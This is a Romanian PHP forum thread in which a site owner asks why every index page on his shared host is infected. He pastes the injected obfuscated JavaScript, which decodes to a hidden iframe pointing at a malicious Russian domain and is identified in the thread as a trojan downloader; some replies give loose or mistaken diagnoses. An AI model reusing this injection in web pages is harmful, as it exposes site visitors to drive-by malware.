Forum PHP Romania - Discutii despre PHP, MySQL, Javascript, AJAX, etc

[dannezu]

dupa ce se inchide tag-ul de php din index, mi se adauga urmatorul cod Cod: <!-- o65 --><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072
\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\
u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\
u0078\u002d\u0076\u0069\u0063\u0074\u006f\u0072\
u0079\u002e\u0072\u0075\u002f\u0066\u006f\u0072\
u0075\u006d\u002f\u0069\u006e\u0064\u0065\u0078\
u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\
u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\
u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\
u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\
u0061\u006d\u0065\u003e')</script><!-- c65 -->
care de fapt inseamna Cod: <iframe src="http://x-victory.ru/forum/index.php" width="0" height="0"></iframe> ,
cei de la hostgator sustin ca nu e vina lor ca nu sunt serverele lor infectate si imi spun ca ar fi scriptul meu infectat.
Am pus un index.php care imediat mi-a fost corupt.

1. As dori sa stiu cam unde e problema (la mine sau la ei)
2.As dori sa stiu o metoda de rezolvare.... daca stie careva.

Va multumesc!

[Birkoff]

1. pune o pagina goala html si una goala php pe acel server si apoi ruleaza in browser (o sa vezi pagina goala bineinteles ca nu e nimic in ea)
apoi vezi daca s-a scris ceva in acele pagini goale.

2. trimite paginile prin alt program de ftp

3. ia inapoi acele fisiere de pe server si vezi daca sunt goale sau au acel cod injectat.

daca dupa testele astea fisierele respective (paginile care ar trebui sa fie goale) sunt injectate cu acel cod atunci problema e de la ei, daca nu, atunci problema e de la tine (verifica si cu alt browser)

[dannezu]

am pus o pagina nu tocmai goala, doar cu urmatorul cod
Cod: <?php



echo "test";



>
pe care apoi am vazut ca nici macar nu il scrisesem corect, dupa 3 minute am gasit urmatorul cod

Cod: <?php



echo "test";



><!-- o65 --><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\
u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\
u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\
u0078\u002d\u0076\u0069\u0063\u0074\u006f\u0072\
u0079\u002e\u0072\u0075\u002f\u0066\u006f\u0072\
u0075\u006d\u002f\u0069\u006e\u0064\u0065\u0078\
u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\
u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\
u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\
u0030\u0022\u003e\u003c\u002f\u0069\u0066\u0072\
u0061\u006d\u0065\u003e')</script><!-- c65 -->


asa mi-am si dat seama ca tot pe acel server mai am si alte site-uri cu sute de randuri de cod

acum o sa pun si un index.html sa vad ce pateste


mentionez ca in acelasi cont am si alte site-uri, dar care sunt in alte directoare

[Birkoff]

fa cum am spus eu, si testeaza si cu alt program de ftp si cu alt browser, ca sa eliminini toate posibilitatile de injectie care ar putea veni de la tine...
eventual daca ai posibilitatea testeaza si de pe alt pc

(offtopic) si editeaza-ti posturile care sunt prea lungi, nu ma lasa pe mine sa iti formatez mesajele, daca vezi ca e prea lung textul introdus impartel si tu pe mai multe randuri sa nu mi se lateasca mine browserul pe 2 monitoare...)

[dannezu]

posibilitatea de a se infecta fizic fisierele inainte de a fi postate pe server eu o consider exclusa intrucat fisiere diferite editate la intervale diferite in computere diferite de pes diferite (eu si un coleg) uploadate cu programe diferite au fost identic corupte.

antivirusul sesizeaza prezenta acelui cod indiferent cu ce browser deschid

problema mi-a fost raportata de mai multe persoane intrucat unul dintre site-urile in cauza e foarte vizitat.

Deci, consider ca sunt excluse posibilitatile de a se face inject la mine in comp inainte de a fi postat.

Mai am o nedumerire,
pe host am mai multe site-uri,
unele dintre ele contin formulare metoda de trimitere find post,
banuiesc ... ca find posibila injectia prin acele formulare ...dar nu inteleg cum totusi poate sa ajunga in alte directoare root goale care nu au nici o legatura cu cele ocupate, adica

din www.site1.ro sa ajunga in www.site3.ro in ex. mentionat si site1.ro si site3.ro find pe acelasi serv. gazduite (site 1 contine formulare si tot felul de cod, iar site 3 nu continea decat index.php)

[Birkoff]

problema este doar pe unul din directoare? eu tot cred ca problema este de la ei

[dannezu]

problema este pe toate

insa eu ma gandeam daca e posibil sa intre codul printr-unul dintre site-urile cu formulare si sa patrunda apoi in toate celelate directoare ale altor site-uri de pe server(gen root ca nu stiu cum sa le zic) care nu au fisiere cu formulare cum s-a si intamplat de fapt.

iar Cod: editat de moderator - cod prea lung si neformatat

e de fapt un text uniode care inseamna:

Cod: <iframe src="http://x-victory.ru/forum/index.php" width="0" height="0"></iframe>
[/code]

[crivion]

se cheama cross side scripting deci daca permiti undeva sa se faca upload de acolo vine problema

[dannezu]

permit sa fac upload in unele site-uri dar nu pot sa inteleg de ce sunt corupte si index-urile site-urilor care nu au nici o legatura cu upload-ul.


doresc sa stiu care ar fi rezolvarea pt siteurile cu upload ca sa evit aceasta problema...?


Si va multumesc foarte mult pentru interesul manifestat si ajutorul dat.

[crivion]

cam dificil, ar trebui sa stai sa verifici fiecare header de imagine sau ce permiti tu la upload si sa vezi care contine scriptul

[dannezu]

nu stiu daca se interpreteaza ca fiind reclama dar situatia sta in felul urmator: am site-ul www.etitrari.rocare contine fisiere care fac upload si downlaoad, mai am totodata si www.pasima.especial.rocare nu are absolut nici o treaba cu primul site doar ca sunt hostate pe acelasi server. In pasima.especial.ro am pus ca sa imi dau seama doar un fisier pe care l-am denumit index.php .
Intrebarea e:

cum s-a infectat www.pasima.especial.ro din moment ce nu avea nici un script pt upload in el???

[floorin]

frate, e infectat chiar frumos: Trojan-Downloader.JS.Agent.lk
Formateaza si tu serverul ala! :lol:

[dannezu]

orice fisier index , main sau home .htm .html sau .php sunt infectate automat fara a fi nevoie sa contina neaparat ceva iar in .htacces mi-a aparut urmatorul cod:

Cod:
<Files 403.shtml>
order allow,deny
allow from all
</Files>



care nu pra stiu ce vrea sa zica....

Cred ca am nevoie de ajutor.... sa cheme cineva un medic :)

[Birkoff]

poti sa verifici daca si altii care au site gazduit la ei sunt infectati?

Vorbeste iar cu adminii de la acel hosting spunele ca ai 2 domenii diferite fara legatura intre ele si care usnt infestate la fel cu acelasi virus, sa verifice serverul lor ca la ei e problema.

Sau daca ai acces vezi fisierele de configurare ale serverului daca nu contin un cod de injectare... (httpd.conf si php.ini) eventual renunta la acel hosting

[cigraphics]

e posibil sa fie de la tine cand incarci fisierele pe server incearca sa incarci un fisier gol ex index.php de la alt pc daca face la fel i-a legatura cu hosterii

[PHPRomania Bot]